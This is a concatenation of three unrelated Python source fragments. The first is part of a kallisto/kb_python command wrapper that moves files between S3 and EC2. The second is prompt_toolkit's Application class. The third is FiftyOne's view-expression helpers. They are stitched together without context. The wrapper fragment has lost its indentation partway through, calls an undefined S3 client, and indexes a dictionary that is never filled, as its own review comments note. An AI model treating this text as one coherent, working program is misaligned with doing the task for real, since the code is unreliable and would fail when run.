    a whitelist for that technology and the FASTQ argument order for kb count.

    Keyword Argument:
    logger -- Logger of main function (type: logging.Logger)
    """
    technology_command = ["kb", "--list"]
    # ut_log.log_command returns a truthy value when the command failed.
    listing_failed = ut_log.log_command(
        logger,
        technology_command,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        shell=True,
    )
    if listing_failed:
        logger.info(
            "Failed to view single-cell technology list compatible with the kb_python package"
        )
        sys.exit(1)
def parse_ref(args, run_dir, logger):
    """Parser for the `ref` command. Build kallisto index files.
    Keyword Arguments:
    args -- Command-line arguments dictionary, as parsed by argparse (type: dict)
    run_dir -- Path on the EC2 instance under which jobs are run (type: pathlib.Path)
    logger -- Logger object that exposes the interface the code directly uses (type: logging.Logger)
    """
    # Build paths on the EC2 instance to store inputs and outputs of kallisto
    # index building. Download kallisto index building files from the AWS S3
    # bucket to the EC2 instance, if not using the in-built kallisto indices.
    kallisto_index_dir = run_dir / "kallisto_index"
    kallisto_index_inputs = kallisto_index_dir / "inputs"
    kallisto_index_outputs = kallisto_index_dir / "outputs"
    kallisto_index_inputs.mkdir(parents=True)
    kallisto_index_outputs.mkdir(parents=True)
    kb_ref_paths = dict()    # local paths keyed by "<arg>_path"
    s3_kb_ref = dict()       # S3 bucket/prefix pairs keyed by "s3_<arg>_*"
    # NOTE(review): kb_ref_output_to_s3 is never populated anywhere in this
    # function, yet the upload loop below indexes it per output file — that
    # lookup will raise KeyError on the first upload. Confirm against the
    # original repository whether a mapping step was lost.
    kb_ref_output_to_s3 = dict()
    if "-d" not in sys.argv:
        # No prebuilt index requested: fetch the reference inputs from S3.
        if "--workflow" in sys.argv and "kite" in sys.argv:
            kb_ref_paths["feature_path"] = kallisto_index_inputs / os.path.basename(
                args.feature
            )
            (
                s3_kb_ref["s3_feature_bucket"],
                s3_kb_ref["s3_feature_prefix"],
            ) = s3u.s3_bucket_and_key(args.feature)
            # NOTE(review): `s3c` (presumably a module-level boto3 S3 client)
            # is not defined in this function or the visible module scope —
            # verify it is created elsewhere in this file.
            s3c.download_file(
                Bucket=s3_kb_ref["s3_feature_bucket"],
                Key=s3_kb_ref["s3_feature_prefix"],
                Filename=str(kb_ref_paths["feature_path"]),
            )
        for arg in ["fasta", "gtf"]:
            kb_ref_paths[arg + "_path"] = kallisto_index_inputs / os.path.basename(
                getattr(args, arg)
            )
            (
                s3_kb_ref["s3_" + arg + "_bucket"],
                s3_kb_ref["s3_" + arg + "_prefix"],
            ) = s3u.s3_bucket_and_key(getattr(args, arg))
            s3c.download_file(
                Bucket=s3_kb_ref["s3_" + arg + "_bucket"],
                Key=s3_kb_ref["s3_" + arg + "_prefix"],
                Filename=str(kb_ref_paths[arg + "_path"]),
            )
    # Resolve local paths and S3 destinations for every output-style flag
    # that was passed on the command line.
    for arg in ["-i", "-g", "-f1", "-f2", "-c1", "-c2", "--tmp"]:
        if arg in sys.argv:
            # Strip the leading dash(es) to get the argparse attribute name.
            arg = arg[2:] if arg == "--tmp" else arg[1:]
            print(
                f"testing purpose - see if getattr(args, arg) output all argument names from '-i', '-g', '-f1', '-f2', '-c1', '-c2', '--tmp': {getattr(args, arg)}"
            )  # testing purpose
            if arg == "tmp":
                # Temp dir gets a fixed local name and an "alter_tmp" S3 prefix.
                kb_ref_paths[arg + "_path"] = kallisto_index_dir / "alter_tmp"
                s3_kb_ref["s3_" + arg + "_bucket"] = s3u.s3_bucket_and_key(
                    getattr(args, arg)
                )[0]
                s3_kb_ref["s3_" + arg + "_prefix"] = posixpath.join(
                    s3u.s3_bucket_and_key(getattr(args, arg))[1], "alter_tmp"
                )
            else:
                kb_ref_paths[arg + "_path"] = kallisto_index_outputs / os.path.basename(
                    getattr(args, arg)
                )
                (
                    s3_kb_ref["s3_" + arg + "_bucket"],
                    s3_kb_ref["s3_" + arg + "_prefix"],
                ) = s3u.s3_bucket_and_key(getattr(args, arg))
    # Build the command of running `kb ref` to generate kallisto index files
    ref_input_boolean = ["--lamanno", "--overwrite", "--keep-tmp", "--verbose"]
    ref_input_upload_required = ["-i", "-g", "-f1", "-f2", "-c1", "-c2", "--tmp"]
    ref_input_left_args = ["-d", "-n", "-k", "--workflow"]
    kb_ref_command = ["kb", "ref"]
    for input in ["fasta", "gtf"]:
        if "-d" not in sys.argv:
            print(
                f"testing purpose: `ref` positional argument: {getattr(args, input)}"
            )  # testing purpose
            if "--workflow" in sys.argv and "kite" in sys.argv:
                print(
                    f"testing purpose: `ref` positional argument: {getattr(args, input)}"
                )  # testing purpose
                # NOTE(review): this appends feature_path once per iteration of
                # the fasta/gtf loop (i.e. twice) — confirm that is intended.
                kb_ref_command += [str(kb_ref_paths["feature_path"])]
            kb_ref_command += [str(kb_ref_paths[input + "_path"])]
    for input in ref_input_boolean:
        if input in sys.argv:
            kb_ref_command += [input]
    for input in ref_input_upload_required:
        if input in sys.argv:
            kb_ref_command += [
                input,
                str(kb_ref_paths[input[2:] + "_path"])
                if input == "--tmp"
                else str(kb_ref_paths[input[1:] + "_path"]),
            ]
    for input in ref_input_left_args:
        if input in sys.argv:
            # NOTE(review): getattr(args, "-d") / getattr(args, "--workflow")
            # use the raw flag text, not the argparse dest name — verify these
            # attributes actually exist on `args`.
            kb_ref_command += [input, getattr(args, input)]
    print(
        f"testing purpose - check if kb_ref_command is of correct format: {kb_ref_command}"
    )  # testing purpose
    # Run the command to generate kallisto index files, and upload the output
    # files on the EC2 instance back to AWS S3.
    kb_ref_failed = ut_log.log_command(
        logger,
        kb_ref_command,
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        universal_newlines=True,
    )
    kb_ref_t_config = TransferConfig(
        use_threads=False
    )  # testing purpose: comment this line if this runs into error. kallisto indices are not pretty big and don't necessarily need a transfer config
    if kb_ref_failed:
        raise RuntimeError("kallisto index building failed")
    else:
        kb_ref_upload_files = glob.glob(str(kallisto_index_outputs / "*"))
        print(
            f"testing purpose - check kallisto index files: {kb_ref_upload_files}"
        )  # testing purpose
        for file in kb_ref_upload_files:
            logger.info(
                f"Uploading {os.path.basename(file)} from the EC2 instance to AWS S3"
            )
            s3c.upload_file(
                Filename=file,
                Bucket=kb_ref_output_to_s3[file][0],
                Key=kb_ref_output_to_s3[file][1],
                Config=kb_ref_t_config,
            )
            # Pace the uploads (why 30s is needed is not evident from this code).
            time.sleep(30)
            print(
                f"testing purpose - see if kb_ref upload_file function intakes correct bucket and prefix names for kallisto index output files: {kb_ref_output_to_s3[file][0]}, {kb_ref_output_to_s3[file][1]}"
            )  # testing purpose
    return
def parse_count(args, run_dir, logger):
"""Parser for the `count` command. Data quantification with kallisto and bustools.
Keyword Arguments:
args -- Command-line arguments dictionary, as parsed by argparse (type: dict)
run_dir -- Path on the EC2 instance under which jobs are run (type: pathlib.Path)
logger -- Logger object that exposes the interface the code directly uses (type: logging.Logger)
"""
# Build paths on the EC2 instance to store inputs and outputs of kb data quantification results.
kb_count_dir = run_dir / "kb_count"
kb_fastqs = kb_count_dir / "fastqs"
kb_count_inputs = kb_count_dir / "inputs"
kb_count_outputs = kb_count_dir / "outputs"
kb_fastqs.mkdir(parents=True)
kb_count_inputs.mkdir(parents=True)
kb_count_outputs.mkdir(parents=True)
kb_count_paths = dict()
s3_kb_count = dict()
for arg in ["--tmp", "-o", "-w", "-i", "-g", "-c1", "-c2"]:
if arg in sys.argv:
arg = arg[2:] if arg == "--tmp" else arg[1:]
print(
f"testing purpose - see if getattr(args, arg) returns the correct values for `kb count` inputs: {getattr(args, arg)}"
) # testing purpose
if arg == "tmp":
kb_count_paths[arg + "_path"] = kb_count_dir / "alter_tmp"
s3_kb_count["s3_" + arg + "_prefix"] = posixpath.join(
s3u.s3_bucket_and_key(getattr(args, arg))[1], "alter_tmp"
)
elif arg == "o":
kb_count_paths[arg + "_path"] = kb_count_outputs
s3_kb_count["s3_" + arg + "_prefix"] = posixpath.join(
s3u.s3_bucket_and_key(getattr(args, arg))[1], "outputs"
)
else:
kb_count_paths[arg + "_path"] = kb_count_inputs / os.path.basename(
getattr(args, arg)
)
(
s3_kb_count["s3_" + arg + "_bucket"],
s3_kb_count["s3_" + arg + "_prefix"],
) = s3u.s3_bucket_and_key(getattr(args, arg))
s3c.download_file(
Bucket=s3_kb_count["s3_" + arg + "_bucket"],
Key=s3_kb_count["s3_" + arg + "_prefix"],
Filename=str(kb_count_paths[arg + "_path"]),
)
s3_kb_count["s3_" + arg + "_bucket"] = s3u.s3_bucket_and_key(
getattr(args, arg)
)[0]
# Download fastq files from the AWS S3 bucket to the EC2 instance.
(
kb_count_paths["fastqs_path"],
s3_kb_count["s3_fastqs_bucket"],
s3_kb_count["s3_fastqs_prefix"],
) = (dict(), dict(), dict())
kb_count_fastq_files_paths, s3_kb_count_fastqs_bucket, s3_kb_count_fastqs_prefix = (
kb_count_paths["fastqs_path"],
s3_kb_count["s3_fastqs_bucket"],
s3_kb_count["s3_fastqs_prefix"],
)
s3_fastq_folder_bucket, s3_fastq_folder_prefix = s3u.s3_bucket_and_key(
args.fastq_folder
)
s3_fastq_files_prefix = list(
s3u.get_files(bucket=s3_fastq_folder_bucket, prefix=s3_fastq_folder_prefix)
)[1:]
print(
"testing purpose - see if all fastq files prefix are extracted: {s3_fastq_files_prefix}"
) # testing purpose
fastq_format = re.compile("([^/]+)_R\d(?:_\d+)?.fastq.gz$")
for fastq_prefix in s3_fastq_files_prefix:
if not fastq_format.search(os.path.basename(fastq_prefix)):
continue
kb_count_fastq_files_paths[
os.path.basename(fastq_prefix)
] = kb_fastqs / os.path.basename(fastq_prefix)
s3_kb_count_fastqs_bucket[
os.path.basename(fastq_prefix)
] = s3_fastq_folder_bucket
s3_kb_count_fastqs_prefix[os.path.basename(fastq_prefix)] = fastq_prefix
fastq_t_config = TransferConfig(
use_threads=False
) # testing purpose: comment this line if this runs into error.
s3c.download_file(
Bucket=s3_kb_count_fastqs_bucket[os.path.basename(fastq_prefix)],
Key=s3_kb_count_fastqs_prefix[os.path.basename(fastq_prefix)],
Filename=str(kb_count_fastq_files_paths[os.path.basename(fastq_prefix)]),
Config=fastq_t_config,
)
# Build the command of running `kb count` to generate count matrices
count_input_boolean = [
"--keep-tmp",
"--verbose",
"--mm",
"--tcc",
"--overwrite",
"--lamanno",
"--nucleus",
"--loom",
"--h5ad",
]
count_input_file_transfer_required = ["--tmp", "-o", "-w"]
count_input_kb_indices = ["-i", "-g", "-c1", "-c2"]
count_input_left_args = ["-t", "-m", "--workflow", "--filter", "-x"]
kb_count_command = ["kb", "count"]
for fastq_path in kb_count_fastq_files_paths.values():
print(
f"testing purpose - view the paths of individual fastqs on the EC2 instance, i.e. values of dictionary `kb_count_fastq_files_paths`: {kb_count_fastq_files_paths.values()}"
) # testing purpose
kb_count_command += [str(fastq_path)]
for input in count_input_boolean:
if input in sys.argv:
kb_count_command += [input]
for input in count_input_file_transfer_required:
if input in sys.argv:
kb_count_command += [
input,
str(kb_count_paths[input[2:] + "_path"])
if input == "--tmp"
else str(kb_count_paths[input[1:] + "_path"]),
]
for input in count_input_kb_indices:
if input in sys.argv:
kb_count_command += [input, str(kb_count_paths[input[1:] + "_path"])]
for input | |
<reponame>j6k4m8/python-prompt-toolkit<filename>prompt_toolkit/application/application.py<gh_stars>0
from __future__ import unicode_literals
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.cache import SimpleCache
from prompt_toolkit.clipboard import Clipboard, InMemoryClipboard
from prompt_toolkit.enums import EditingMode
from prompt_toolkit.eventloop import get_event_loop, ensure_future, Return, run_in_executor, run_until_complete, call_from_executor, From
from prompt_toolkit.eventloop.base import get_traceback_from_context
from prompt_toolkit.filters import to_filter, Condition
from prompt_toolkit.input.base import Input
from prompt_toolkit.input.defaults import get_default_input
from prompt_toolkit.input.typeahead import store_typeahead, get_typeahead
from prompt_toolkit.key_binding.bindings.page_navigation import load_page_navigation_bindings
from prompt_toolkit.key_binding.defaults import load_key_bindings
from prompt_toolkit.key_binding.key_bindings import KeyBindings, ConditionalKeyBindings, KeyBindingsBase, merge_key_bindings, GlobalOnlyKeyBindings
from prompt_toolkit.key_binding.key_processor import KeyProcessor
from prompt_toolkit.key_binding.emacs_state import EmacsState
from prompt_toolkit.key_binding.vi_state import ViState
from prompt_toolkit.keys import Keys
from prompt_toolkit.layout.controls import BufferControl
from prompt_toolkit.layout.dummy import create_dummy_layout
from prompt_toolkit.layout.layout import Layout, walk
from prompt_toolkit.output import Output, ColorDepth
from prompt_toolkit.output.defaults import get_default_output
from prompt_toolkit.renderer import Renderer, print_formatted_text
from prompt_toolkit.search import SearchState
from prompt_toolkit.styles import BaseStyle, default_ui_style, default_pygments_style, merge_styles, DynamicStyle, DummyStyle, StyleTransformation, DummyStyleTransformation
from prompt_toolkit.utils import Event, in_main_thread
from .current import set_app
from .run_in_terminal import run_in_terminal, run_coroutine_in_terminal
from subprocess import Popen
from traceback import format_tb
import os
import re
import signal
import six
import sys
import time
__all__ = [
'Application',
]
class Application(object):
"""
The main Application class!
This glues everything together.
:param layout: A :class:`~prompt_toolkit.layout.Layout` instance.
:param key_bindings:
:class:`~prompt_toolkit.key_binding.KeyBindingsBase` instance for
the key bindings.
:param clipboard: :class:`~prompt_toolkit.clipboard.Clipboard` to use.
:param on_abort: What to do when Control-C is pressed.
:param on_exit: What to do when Control-D is pressed.
:param full_screen: When True, run the application on the alternate screen buffer.
:param color_depth: Any :class:`~.ColorDepth` value, a callable that
returns a :class:`~.ColorDepth` or `None` for default.
:param erase_when_done: (bool) Clear the application output when it finishes.
:param reverse_vi_search_direction: Normally, in Vi mode, a '/' searches
forward and a '?' searches backward. In Readline mode, this is usually
reversed.
:param min_redraw_interval: Number of seconds to wait between redraws. Use
this for applications where `invalidate` is called a lot. This could cause
a lot of terminal output, which some terminals are not able to process.
`None` means that every `invalidate` will be scheduled right away
(which is usually fine).
When one `invalidate` is called, but a scheduled redraw of a previous
`invalidate` call has not been executed yet, nothing will happen in any
case.
:param max_render_postpone_time: When there is high CPU (a lot of other
scheduled calls), postpone the rendering max x seconds. '0' means:
don't postpone. '.5' means: try to draw at least twice a second.
Filters:
:param mouse_support: (:class:`~prompt_toolkit.filters.Filter` or
boolean). When True, enable mouse support.
:param paste_mode: :class:`~prompt_toolkit.filters.Filter` or boolean.
:param editing_mode: :class:`~prompt_toolkit.enums.EditingMode`.
:param enable_page_navigation_bindings: When `True`, enable the page
navigation key bindings. These include both Emacs and Vi bindings like
page-up, page-down and so on to scroll through pages. Mostly useful for
creating an editor or other full screen applications. Probably, you
don't want this for the implementation of a REPL. By default, this is
enabled if `full_screen` is set.
Callbacks (all of these should accept a
:class:`~prompt_toolkit.application.Application` object as input.)
:param on_reset: Called during reset.
:param on_invalidate: Called when the UI has been invalidated.
:param before_render: Called right before rendering.
:param after_render: Called right after rendering.
I/O:
:param input: :class:`~prompt_toolkit.input.Input` instance.
:param output: :class:`~prompt_toolkit.output.Output` instance. (Probably
Vt100_Output or Win32Output.)
Usage:
app = Application(...)
app.run()
"""
def __init__(self, layout=None,
             style=None,
             include_default_pygments_style=True,
             style_transformation=None,
             key_bindings=None, clipboard=None,
             full_screen=False, color_depth=None,
             mouse_support=False,
             enable_page_navigation_bindings=None,  # Can be None, True or False.
             paste_mode=False,
             editing_mode=EditingMode.EMACS,
             erase_when_done=False,
             reverse_vi_search_direction=False,
             min_redraw_interval=None,
             max_render_postpone_time=0,
             on_reset=None, on_invalidate=None,
             before_render=None, after_render=None,
             # I/O.
             input=None, output=None):
    """
    Create the `Application`.

    See the class docstring for the meaning of each parameter. The body
    below performs, in order: filter/argument normalization, type
    assertions, default construction for `layout`/`style_transformation`,
    plain attribute assignment, event wiring, renderer construction, and
    finally a `reset()` to put the application in a clean initial state.
    The statement order matters: e.g. the renderer needs `self.output`,
    `self.input` and the merged style to exist first.
    """
    # If `enable_page_navigation_bindings` is not specified, enable it in
    # case of full screen applications only. This can be overridden by the user.
    if enable_page_navigation_bindings is None:
        enable_page_navigation_bindings = Condition(lambda: self.full_screen)

    # Normalize all bool-or-Filter arguments into `Filter` objects.
    paste_mode = to_filter(paste_mode)
    mouse_support = to_filter(mouse_support)
    reverse_vi_search_direction = to_filter(reverse_vi_search_direction)
    enable_page_navigation_bindings = to_filter(enable_page_navigation_bindings)
    include_default_pygments_style = to_filter(include_default_pygments_style)

    assert layout is None or isinstance(layout, Layout), 'Got layout: %r' % (layout, )
    assert key_bindings is None or isinstance(key_bindings, KeyBindingsBase)
    assert clipboard is None or isinstance(clipboard, Clipboard)
    assert isinstance(full_screen, bool)
    assert (color_depth is None or callable(color_depth) or
            color_depth in ColorDepth._ALL), 'Got color_depth: %r' % (color_depth, )
    assert isinstance(editing_mode, six.string_types)
    assert style is None or isinstance(style, BaseStyle)
    assert style_transformation is None or isinstance(style_transformation, StyleTransformation)
    assert isinstance(erase_when_done, bool)
    assert min_redraw_interval is None or isinstance(min_redraw_interval, (float, int))
    assert max_render_postpone_time is None or isinstance(max_render_postpone_time, (float, int))
    assert on_reset is None or callable(on_reset)
    assert on_invalidate is None or callable(on_invalidate)
    assert before_render is None or callable(before_render)
    assert after_render is None or callable(after_render)
    assert output is None or isinstance(output, Output)
    assert input is None or isinstance(input, Input)

    # Fall back to harmless defaults for layout/style transformation.
    if layout is None:
        layout = create_dummy_layout()

    if style_transformation is None:
        style_transformation = DummyStyleTransformation()

    self.style = style
    self.style_transformation = style_transformation

    # Key bindings.
    self.key_bindings = key_bindings
    self._default_bindings = load_key_bindings()
    self._page_navigation_bindings = load_page_navigation_bindings()

    self.layout = layout
    self.clipboard = clipboard or InMemoryClipboard()
    self.full_screen = full_screen
    self._color_depth = color_depth
    self.mouse_support = mouse_support

    self.paste_mode = paste_mode
    self.editing_mode = editing_mode
    self.erase_when_done = erase_when_done
    self.reverse_vi_search_direction = reverse_vi_search_direction
    self.enable_page_navigation_bindings = enable_page_navigation_bindings
    self.min_redraw_interval = min_redraw_interval
    self.max_render_postpone_time = max_render_postpone_time

    # Events.
    self.on_invalidate = Event(self, on_invalidate)
    self.on_reset = Event(self, on_reset)
    self.before_render = Event(self, before_render)
    self.after_render = Event(self, after_render)

    # I/O.
    self.output = output or get_default_output()
    self.input = input or get_default_input()

    # List of 'extra' functions to execute before a Application.run.
    self.pre_run_callables = []

    self._is_running = False
    self.future = None

    #: Quoted insert. This flag is set if we go into quoted insert mode.
    self.quoted_insert = False

    #: Vi state. (For Vi key bindings.)
    self.vi_state = ViState()
    self.emacs_state = EmacsState()

    #: When to flush the input (For flushing escape keys.) This is important
    #: on terminals that use vt100 input. We can't distinguish the escape
    #: key from for instance the left-arrow key, if we don't know what follows
    #: after "\x1b". This little timer will consider "\x1b" to be escape if
    #: nothing did follow in this time span.
    #: This seems to work like the `ttimeoutlen` option in Vim.
    self.ttimeoutlen = .5  # Seconds.

    #: Like Vim's `timeoutlen` option. This can be `None` or a float. For
    #: instance, suppose that we have a key binding AB and a second key
    #: binding A. If the user presses A and then waits, we don't handle
    #: this binding yet (unless it was marked 'eager'), because we don't
    #: know what will follow. This timeout is the maximum amount of time
    #: that we wait until we call the handlers anyway. Pass `None` to
    #: disable this timeout.
    self.timeoutlen = 1.0

    #: The `Renderer` instance.
    # Make sure that the same stdout is used, when a custom renderer has been passed.
    self._merged_style = self._create_merged_style(include_default_pygments_style)

    self.renderer = Renderer(
        self._merged_style,
        self.output,
        self.input,
        full_screen=full_screen,
        mouse_support=mouse_support,
        cpr_not_supported_callback=self.cpr_not_supported_callback)

    #: Render counter. This one is increased every time the UI is rendered.
    #: It can be used as a key for caching certain information during one
    #: rendering.
    self.render_counter = 0

    # Invalidate flag. When 'True', a repaint has been scheduled.
    self._invalidated = False
    self._invalidate_events = []  # Collection of 'invalidate' Event objects.
    self._last_redraw_time = 0  # Unix timestamp of last redraw. Used when
                                # `min_redraw_interval` is given.

    #: The `InputProcessor` instance.
    self.key_processor = KeyProcessor(_CombinedRegistry(self))

    # If `run_in_terminal` was called. This will point to a `Future` what will be
    # set at the point when the previous run finishes.
    self._running_in_terminal = False
    self._running_in_terminal_f = None

    # Trigger initialize callback.
    self.reset()
def _create_merged_style(self, include_default_pygments_style):
    """
    Build the effective `Style` for this application by merging, in
    increasing priority: the default UI style, the (conditionally
    included) default Pygments style, and the user-supplied `self.style`.

    `include_default_pygments_style` is a `Filter`; it is re-evaluated on
    every style lookup via `DynamicStyle`, so toggling it at runtime works.
    """
    no_style = DummyStyle()
    pygments = default_pygments_style()

    # Dynamically choose between the Pygments style and an empty style,
    # depending on the current value of the filter.
    pygments_when_enabled = DynamicStyle(
        lambda: pygments if include_default_pygments_style() else no_style)

    return merge_styles([
        default_ui_style(),
        pygments_when_enabled,
        DynamicStyle(lambda: self.style),
    ])
@property
def color_depth(self):
    """
    Active :class:`.ColorDepth`.

    `self._color_depth` may be a fixed value, a callable producing one, or
    `None` (meaning: use the environment default).
    """
    configured = self._color_depth
    if callable(configured):
        configured = configured()
    return ColorDepth.default() if configured is None else configured
@property
def current_buffer(self):
    """
    The currently focused :class:`~.Buffer`.

    When no actual buffer has the focus, a throwaway dummy `Buffer` is
    returned instead of `None`, so callers never need a None-check.
    """
    focused = self.layout.current_buffer
    if focused:
        return focused
    return Buffer(name='dummy-buffer')  # Dummy buffer.
@property
def current_search_state(self):
    """
    Return the current :class:`.SearchState` for the focused
    :class:`.BufferControl`, or a dummy `SearchState` when some other
    control has the focus (never `None`).
    """
    control = self.layout.current_control
    if not isinstance(control, BufferControl):
        return SearchState()  # Dummy search state. (Don't return None!)
    return control.search_state
def reset(self):
"""
| |
whether any of the given expressions evaluate to True.
If no expressions are provided, returns False.
Examples::
import fiftyone as fo
import fiftyone.zoo as foz
from fiftyone import ViewField as F
dataset = foz.load_zoo_dataset("quickstart")
# Create a view that only contains predictions that are "cat" or
# highly confident
is_cat = F("label") == "cat"
is_confident = F("confidence") > 0.95
view = dataset.filter_labels(
"predictions", F.any([is_cat, is_confident])
)
print(dataset.count("predictions.detections"))
print(view.count("predictions.detections"))
Args:
exprs: a :class:`ViewExpression` or iterable of
:class:`ViewExpression` instances
Returns:
a :class:`ViewExpression`
"""
if isinstance(exprs, ViewExpression) or not etau.is_container(exprs):
exprs = [exprs]
else:
exprs = list(exprs)
num_exprs = len(exprs)
if num_exprs == 0:
return ViewExpression(False)
if num_exprs == 1:
return exprs[0]
return ViewExpression({"$or": exprs})
@staticmethod
def all(exprs):
    """Checks whether all of the given expressions evaluate to True.

    If no expressions are provided, returns True.

    Examples::

        import fiftyone as fo
        import fiftyone.zoo as foz
        from fiftyone import ViewField as F

        dataset = foz.load_zoo_dataset("quickstart")

        # Create a view that only contains predictions that are "cat" and
        # highly confident
        is_cat = F("label") == "cat"
        is_confident = F("confidence") > 0.95
        view = dataset.filter_labels(
            "predictions", F.all([is_cat, is_confident])
        )

    Args:
        exprs: a :class:`ViewExpression` or iterable of
            :class:`ViewExpression` instances

    Returns:
        a :class:`ViewExpression`
    """
    # A bare expression (or any non-container) counts as a single operand
    if not isinstance(exprs, ViewExpression) and etau.is_container(exprs):
        operands = list(exprs)
    else:
        operands = [exprs]

    # Degenerate cases: vacuous truth, or nothing to conjoin
    if not operands:
        return ViewExpression(True)

    if len(operands) == 1:
        return operands[0]

    return ViewExpression({"$and": operands})
@staticmethod
def range(start, stop=None):
    """Returns an array expression containing the sequence of integers from
    the specified start (inclusive) to stop (exclusive).

    With both arguments, yields ``[start, start + 1, ..., stop - 1]``;
    with one argument, it is treated as the stop and the sequence is
    ``[0, 1, ..., start - 1]`` — mirroring Python's builtin ``range``.

    Example::

        from fiftyone import ViewField as F

        # An array expression of [0, ..., len(tags) - 1]
        F.range(F("tags").length())

    Args:
        start: the starting value, or stopping value if no ``stop`` is
            provided
        stop (None): the stopping value, if both input arguments are
            provided

    Returns:
        a :class:`ViewExpression`
    """
    # Single-argument form: shift the lone value into the stop slot
    if stop is None:
        start, stop = 0, start

    return ViewExpression({"$range": [start, stop]})
@staticmethod
def enumerate(array, start=0):
    """Returns an array of ``[index, element]`` pairs enumerating the
    elements of the given expression, which must resolve to an array.

    Analogous to Python's builtin ``enumerate``.

    Example::

        from fiftyone import ViewField as F

        # [[0, tag0], [1, tag1], ...]
        F.enumerate(F("tags"))

    Args:
        array: a :class:`ViewExpression` that resolves to an array
        start (0): the starting enumeration index to use

    Returns:
        a :class:`ViewExpression`
    """
    # Pair an index sequence [start, start + len) with the array elements
    indexes = ViewExpression.range(start, stop=start + array.length())
    pairs = ViewExpression.zip(indexes, array)

    # `let_in` binds `array` once so it is not evaluated multiple times
    return array.let_in(pairs)
@staticmethod
def zip(*args, use_longest=False, defaults=None):
    """Zips the given expressions, which must resolve to arrays, into an
    array whose ith element is an array containing the ith element from
    each input array.

    Example::

        from fiftyone import ViewField as F

        # [[tag0, int0], [tag1, int1], ...]
        F.zip(F("tags"), F("ints"))

        # Pad to the longest input, filling gaps with the given defaults
        F.zip(F("tags"), F("ints"), use_longest=True, defaults=("", 0))

    Args:
        *args: one or more arrays or :class:`ViewExpression` instances
            resolving to arrays
        use_longest (False): whether to use the longest array to determine
            the number of elements in the output array. By default, the
            length of the shortest array is used
        defaults (None): an optional array of default values of same length
            as ``*args`` to use when ``use_longest == True`` and the input
            arrays are of different lengths. If no defaults are provided
            and ``use_longest == True``, then missing values are set to
            ``None``

    Returns:
        a :class:`ViewExpression`
    """
    inputs = list(args)

    # Shortest-input semantics need no extra options
    if not use_longest:
        return ViewExpression({"$zip": {"inputs": inputs}})

    spec = {"inputs": inputs, "useLongestLength": True}
    if defaults is not None:
        spec["defaults"] = defaults

    return ViewExpression({"$zip": spec})
# Experimental expressions ###############################################
def _function(self, function):
    # Collapse all runs of whitespace in the JS source to single spaces
    js_body = " ".join(function.split())
    spec = {"$function": {"body": js_body, "args": [self], "lang": "js"}}
    return ViewExpression(spec)
class ViewField(ViewExpression):
    """A :class:`ViewExpression` that refers to a field or embedded field of a
    document.

    You can use
    `dot notation <https://docs.mongodb.com/manual/core/document/#dot-notation>`_
    to refer to subfields of embedded objects within fields.

    A plain name such as ``ViewField("embedded.field.name")`` is interpreted
    relative to the context in which the :class:`ViewField` object is used.
    For example, when passed to :meth:`ViewExpression.map`, it refers to the
    ``embedded.field.name`` attribute of the array element being processed.

    To instead create a :class:`ViewField` that always refers to the root
    document regardless of context, prepend ``"$"`` to the name, as in
    ``ViewField("$embedded.field.name")``.

    Examples::

        from fiftyone import ViewField as F

        # Reference the root of the current context
        F()

        # Reference the `ground_truth` field in the current context
        F("ground_truth")

        # Reference the `label` field of the `ground_truth` object in the
        # current context
        F("ground_truth.label")

        # Reference the root document in any context
        F("$")

        # Reference the `label` field of the root document in any context
        F("$label")

        # Reference the `label` field of the `ground_truth` object in the
        # root document in any context
        F("$ground_truth.label")

    .. automethod:: __eq__
    .. automethod:: __ge__
    .. automethod:: __gt__
    .. automethod:: __le__
    .. automethod:: __lt__
    .. automethod:: __ne__
    .. automethod:: __and__
    .. automethod:: __invert__
    .. automethod:: __or__
    .. automethod:: __abs__
    .. automethod:: __add__
    .. automethod:: __ceil__
    .. automethod:: __floor__
    .. automethod:: __round__
    .. automethod:: __mod__
    .. automethod:: __mul__
    .. automethod:: __pow__
    .. automethod:: __sub__
    .. automethod:: __truediv__
    .. automethod:: __getitem__

    Args:
        name (None): the name of the field, with an optional "$" prepended if
            you wish to freeze this field to the root document
    """

    def __init__(self, name=None):
        if name is None:
            name = ""

        # A leading "$" pins the field to the root document
        frozen = name.startswith("$")
        super().__init__(name[1:] if frozen else name)

        if frozen:
            self._freeze_prefix("")

    def __deepcopy__(self, memo):
        # Copy via the internal state rather than re-parsing the name, so
        # that frozen prefixes survive the copy
        field = self.__class__()
        field._expr = deepcopy(self._expr, memo)
        field._prefix = deepcopy(self._prefix, memo)
        return field

    def to_mongo(self, prefix=None):
        """Returns a MongoDB representation of the field.

        Args:
            prefix (None): an optional prefix to prepend to the field name

        Returns:
            a string
        """
        # Frozen fields always use their own stored prefix
        if self.is_frozen:
            prefix = self._prefix

        if prefix:
            if self._expr:
                return prefix + "." + self._expr

            return prefix

        if self._expr:
            return "$" + self._expr

        return "$$ROOT" if self.is_frozen else "$$CURRENT"
class ObjectId(ViewExpression):
    """A :class:`ViewExpression` that refers to an
    `ObjectId <https://docs.mongodb.com/manual/reference/method/ObjectId>`_ of
    a document.

    The typical use case for this class is writing an expression that checks
    whether the ID of a document matches a particular known ID.

    Example::

        from fiftyone import ViewField as F
        from fiftyone.core.expressions import ObjectId

        # Check if the ID of the document matches the given ID
        expr = F("_id") == ObjectId("5f452489ef00e6374aad384a")

    Args:
        oid: the object ID string
    """

    def __init__(self, oid):
        # Validation only: constructing a bson ObjectId raises if `oid` is
        # not a well-formed object ID string
        bson.ObjectId(oid)
        super().__init__(oid)

    def to_mongo(self, prefix=None):
        """Returns a MongoDB representation of the ObjectId.

        Args:
            prefix (None): unused

        Returns:
            a MongoDB expression
        """
        return {"$toObjectId": self._expr}
def _do_to_mongo(val, prefix):
    # Recursively serialize `val` into its MongoDB representation
    if isinstance(val, ViewExpression):
        result = val.to_mongo(prefix=prefix)
    elif isinstance(val, dict):
        # Serialize both keys and values
        result = {}
        for key, value in val.items():
            result[_do_to_mongo(key, prefix)] = _do_to_mongo(value, prefix)
    elif isinstance(val, list):
        result = [_do_to_mongo(element, prefix) for element in val]
    elif isinstance(val, (date, datetime)):
        # The timestamp must be float (not int) to avoid errors near the epoch
        result = {"$toDate": fou.datetime_to_timestamp(val)}
    elif isinstance(val, timedelta):
        result = fou.timedelta_to_ms(val)
    else:
        # Primitives pass through unchanged
        result = val

    return result
def _do_freeze_prefix(val, prefix):
    # Assign `prefix` to every not-yet-frozen expression nested in `val`
